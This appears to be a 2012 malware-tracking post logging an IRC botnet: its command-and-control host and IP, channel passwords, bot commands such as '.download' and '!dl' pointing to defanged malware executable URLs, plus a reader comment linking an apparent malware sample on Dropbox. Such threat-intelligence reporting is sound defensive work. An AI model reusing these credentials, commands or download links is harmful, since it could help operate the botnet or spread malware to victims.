Resolved : [botnet.gen.tr] To [88.255.116.47]
Remote Host Port
botnet.gen.tr 6667 Passwd secret
Channels
Now talking in #XXX
Topic On: [ #XXX 12] [ 13 .html .lan .dwl hxxp://www.universe-bty.co.th/promina_images/MuTomyumZ_Full_V2.exe .visit hxxp://www.alizametal.com.tr/KCA.html ]
Topic By: [ KCA ]
[5:36](KCA) .visit hxxp://www.alizametal.com.tr/KCA.html
([iRooT-W7-USA]564523) hxxp://www.alizametal.com.tr/KCA.html Has Been Visited!
([iRooT-W7-USA]553377) hxxp://www.alizametal.com.tr/KCA.html Has Been Visited!
Now talking in #x
Topic On: [ #x ] [ .download hxxp://www.universe-bty.co.th/promina_images/MuTomyumZ_Full.exe 1 ]
Topic By: [ Jorgee ]
Username: 0812
Nickname: [0812|DEU|XP|KCA]
Channel: #CMDD# (Password: KCA)
Channeltopic: :!KCA
UPDATE:
Download URLs
hxxp://199.15.234.7/ (api.wipmania.com)
hxxp://www.universe-bty.co.th/promina_images/t.exe (www.universe-bty.co.th)
hxxp://www.universe-bty.co.th/promina_images/ded.exe (www.universe-bty.co.th)
C&C Server: 88.255.116.47:1453
Server Password:
Username: nivaykw
Nickname: U[DE|XPa]nivaykw
Channel: #cmd (Password: KCA)
Channeltopic: :!dl hxxp://www.sehat-iq.com/cm.exe !mdns hxxp://www.sehat-iq.com/av.txt
Hosting info:
http://whois.domaintools.com/88.255.116.47
Anonymous - September 29, 2012 at 12:19 am
Here is one to look at https://dl.dropbox.com/u/104452013/broaio.exe
Pig - September 29, 2012 at 6:03 pm
link is dead